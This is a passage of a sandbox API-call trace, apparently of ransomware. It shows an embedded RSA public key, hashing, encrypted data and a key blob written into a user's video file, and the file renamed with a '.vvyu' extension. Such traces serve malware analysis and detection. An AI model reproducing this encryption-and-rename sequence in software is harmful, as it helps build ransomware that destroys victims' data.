KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.721] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.721] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6e9a40) returned 1 [0190.722] CryptCreateHash (in: hProv=0x6e9a40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0190.722] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.722] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0190.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0190.722] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0190.722] GetLastError () returned 0x0 [0190.722] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0190.722] CryptReleaseContext (hProv=0x6e9a40, dwFlags=0x0) returned 1 [0190.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0190.722] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0190.723] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0190.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.723] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0190.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0190.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc370) returned 0x2d45778 [0190.723] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0190.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0190.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0190.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0190.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30b08 [0190.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39b98 [0190.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30ac0 [0190.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bb0 [0190.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39be0 [0190.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c40 [0190.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bf8 [0190.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0190.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0190.724] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3bd70 [0190.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0190.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39be0 | out: hHeap=0x6a0000) returned 1 [0190.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bf8 | out: hHeap=0x6a0000) returned 1 [0190.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c40 | out: hHeap=0x6a0000) returned 1 [0190.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0190.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c40 [0190.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0190.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39bf8 [0190.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0190.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d39be0 [0190.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0190.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0190.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0190.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0190.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0190.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0190.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0190.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0190.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bf8 | out: hHeap=0x6a0000) returned 1 [0190.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39be0 | out: hHeap=0x6a0000) returned 1 [0190.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c40 | out: hHeap=0x6a0000) returned 1 [0190.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0190.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bd70 | out: hHeap=0x6a0000) returned 1 [0190.727] GetCurrentThreadId () returned 0x264 [0190.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0190.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d44990 [0190.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0190.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0190.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0190.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0190.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0190.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0190.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.728] GetCurrentThreadId () returned 0x264 [0190.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0190.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0190.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0190.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0190.730] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.730] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82d20 [0190.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0190.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0190.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c40 [0190.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0190.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0190.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0190.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0190.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0190.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0190.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39be0 [0190.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0190.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0190.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0190.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0190.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0190.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39bf8 [0190.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0190.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0190.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0190.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39bc8 [0190.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0190.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c58 [0190.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0190.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0190.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c28 [0190.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0190.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39c10 [0190.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c70 [0190.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c10 | out: hHeap=0x6a0000) returned 1 [0190.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39c10 [0190.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c28 | out: hHeap=0x6a0000) returned 1 [0190.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0190.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0190.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0190.732] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0190.732] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27b58 [0190.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39be0 | out: hHeap=0x6a0000) returned 1 [0190.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39be0 [0190.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0190.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0190.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c40 | out: hHeap=0x6a0000) returned 1 [0190.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0190.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c70 | out: hHeap=0x6a0000) returned 1 [0190.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0190.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0190.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0190.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0190.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0190.733] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39be0 | out: hHeap=0x6a0000) returned 1 [0190.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0190.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0190.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0190.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0190.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0190.734] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0190.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0190.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0190.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0190.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0190.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0190.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0190.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c10 | out: hHeap=0x6a0000) returned 1 [0190.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0190.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39c58 | out: hHeap=0x6a0000) returned 1 [0190.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0190.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bf8 | out: hHeap=0x6a0000) returned 1 [0190.736] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bc8 | out: hHeap=0x6a0000) returned 1 [0190.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0190.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0190.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0190.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39bb0 | out: hHeap=0x6a0000) returned 1 [0190.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30ac0 | out: hHeap=0x6a0000) returned 1 [0190.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0190.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0190.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82d20 | out: hHeap=0x6a0000) returned 1 [0190.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0190.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0190.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0190.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0190.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0190.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0190.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0190.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0190.740] WriteFile (in: hFile=0x584, lpBuffer=0x2d45778*, nNumberOfBytesToWrite=0xc362, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d45778*, lpNumberOfBytesWritten=0x30ffb14*=0xc362, lpOverlapped=0x0) returned 1 [0190.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0190.741] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xc367, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.741] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0190.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0190.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c70138 [0190.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0190.741] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0190.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0190.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70138 | out: hHeap=0x6a0000) returned 1 [0190.742] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0190.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0190.742] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.742] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0190.743] CloseHandle (hObject=0x584) returned 1 [0190.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0190.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d154b0 [0190.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0190.745] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\_dEi9BifVC5tQMw.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\_dei9bifvc5tqmw.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\_dEi9BifVC5tQMw.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\_dei9bifvc5tqmw.flv.vvyu")) returned 1 [0190.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0190.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0190.747] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea810 | out: hHeap=0x6a0000) returned 1 [0190.749] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfddb21b0, ftCreationTime.dwHighDateTime=0x1d8a2fa, ftLastAccessTime.dwLowDateTime=0x99524620, ftLastAccessTime.dwHighDateTime=0x1d8a4ed, ftLastWriteTime.dwLowDateTime=0x99524620, ftLastWriteTime.dwHighDateTime=0x1d8a4ed, nFileSizeHigh=0x0, nFileSizeLow=0xc367, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_dEi9BifVC5tQMw.flv", cAlternateFileName="_DEI9B~1.FLV")) returned 0 [0190.749] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0190.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0190.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0190.750] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0190.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82bc0 | out: hHeap=0x6a0000) returned 1 [0190.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0190.750] HeapFree (in: 